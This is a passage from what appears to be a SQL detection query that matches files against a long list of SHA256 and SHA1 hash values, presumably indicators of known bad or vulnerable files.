'%SHA256=9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374%' ESCAPE '\\' OR Hashes LIKE '%SHA256=06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347%' ESCAPE '\\' OR Hashes LIKE '%SHA256=552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de%' ESCAPE '\\' OR Hashes LIKE '%SHA256=314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890%' ESCAPE '\\' OR Hashes LIKE '%SHA256=19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200%' ESCAPE '\\' OR Hashes LIKE '%SHA256=677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993%' ESCAPE '\\' OR Hashes LIKE '%SHA256=082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003%' ESCAPE '\\' OR Hashes LIKE '%SHA256=26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15%' ESCAPE '\\' OR Hashes LIKE '%SHA256=543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433%' ESCAPE '\\' OR Hashes LIKE '%SHA256=da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec%' ESCAPE '\\' OR Hashes LIKE '%SHA256=771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230%' ESCAPE '\\' OR Hashes LIKE '%SHA256=97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893%' ESCAPE '\\') OR sha1 IN ('2261198385d62d2117f50f631652eded0ecc71db', '8db869c0674221a2d3280143cbb0807fac08e0cc', '27d3ebea7655a72e6e8b95053753a25db944ec0f', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '21e6c104fe9731c874fab5c9560c929b2857b918', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '2f991435a6f58e25c103a657d24ed892b99690b8', 'f02af84393e9627ba808d4159841854a6601cf80', 'bb962c9a8dda93e94fef504c4159de881e4706fe', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '6523b3fd87de39eb5db1332e4523ce99556077dc', '72966ca845759d239d09da0de7eebe3abe86fee3', '57511ef5ff8162a9d793071b5bf7ebe8371759de', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '1d0df45ee3fa758f0470e055915004e6eae54c95', 'd5fd9fe10405c4f90235e583526164cd0902ed86', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', '7d7c03e22049a725ace2a9812c72b53a66c2548b', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '468e2e5505a3d924b14fedee4ddf240d09393776', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', '078ae07dec258db4376d5a2a05b9b508d68c0123', '623cd2abef6c92255f79cbbd3309cb59176771da', '1f3a9265963b660392c4053329eb9436deeed339', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', 'c834c4931b074665d56ccab437dfcc326649d612', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', '51b60eaa228458dee605430aae1bc26f3fc62325', '3270720a066492b046d7180ca6e60602c764cac7', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', '19bd488fe54b011f387e8c5d202a70019a204adf', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '205c69f078a563f54f4c0da2d02a25e284370251', 'f9feb60b23ca69072ce42264cd821fe588a186a6', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '4e826430a1389032f3fe06e2cc292f643fb0c417', '7ab4565ba24268f0adadb03a5506d4eb1dc7c181', 'dc7b022f8bd149efbcb2204a48dce75c72633526', '0307d76750dd98d707c699aee3b626643afb6936', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', 'c948ae14761095e4d76b55d9de86412258be7afd', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', '745bad097052134548fe159f158c04be5616afc2', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'ac13941f436139b909d105ad55637e1308f49d9a', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', 'cc0e0440adc058615e31e8a52372abadf658e6b1', '5520ac25d81550a255dc16a0bb89d4b275f6f809', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '6003184788cd3d2fc624ca801df291ccc4e225ee', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '3abb9d0a9d600200ae19c706e570465ef0a15643', '27eab595ec403580236e04101172247c4f5d5426', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', '9c256edd10823ca76c0443a330e523027b70522d', '35829e096a15e559fcbabf3441d99e580ca3b26e', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '054a50293c7b4eea064c91ef59cf120d8100f237', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '14bf0eaa90e012169745b3e30c281a327751e316', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '879fcc6795cebe67718388228e715c470de87dca', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'd62fa51e520022483bdc5847141658de689c0c29', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', '3805e4e08ad342d224973ecdade8b00c40ed31be', '65d8a7c2e867b22d1c14592b020c548dd0665646', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '0b8b83f245d94107cb802a285e6529161d9a834d', 'c969f1f73922fd95db1992a5b552fbc488366a40', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'da9cea92f996f938f699902482ac5313d5e8b28e', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 'f052dc35b74a1a6246842fbb35eb481577537826', 'f0c463d29a5914b01e4607889094f1b7d95e7aaf', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '7fb52290883a6b69a96d480f2867643396727e83', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '693a2645c28fc3b248fda95179c36c3ac64f6fc2', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', 'fe10018af723986db50701c8532df5ed98b17c39', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', '82ba5513c33e056c3f54152c8555abf555f3e745', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', 'bbc1e5fd826961d93b76abd161314cb3592c4436', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', 'b03b1996a40bfea72e4584b82f6b845c503a9748', 'c771ea59f075170e952c393cfd6fc784b265027c', 'cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1', '0918277fcdc64a9dc51c04324377b3468fa1269b', 'b09bcc042d60d2f4c0d08284818ed198cededa04', '8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89', '15df139494d2c40a645fb010908551185c27f3c5', '012db3a80faf1f7f727b538cbe5d94064e7159de', 'd04e5db5b6c848a29732bfd52029001f23c3da75', '490109fa6739f114651f4199196c5121d1c6bdf2', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', 'a87d6eac2d70a3fbc04e59412326b28001c179de', '3f223581409492172a1e875f130f3485b90fbe5f', '5db61d00a001fd493591dc919f69b14713889fc5', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', '9d07df024ec457168bf0be7e0009619f6ac4f13c', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'c6bd965300f07012d1b651a9b8776028c45b149a', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '9c24dd75e4074041dbe03bf21f050c77d748b8e9', 'dc55217b6043d819eadebd423ff07704ee103231', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', 'c6d349823bbb1f5b44bae91357895dba653c5861', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', 'eb1ecad3d37bb980f908bf1a912415cff32e79e6', 'eb0d45aa6f537f5b2f90f3ad99013606eafcd162', '6053d258096bccb07cb0057d700fe05233ab1fbb', '29a190727140f40cea9514a6420f5a195e36386b', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', '99201c9555e5faf6e8d82da793b148311f8aa4b8', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', 'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', '943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', '7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 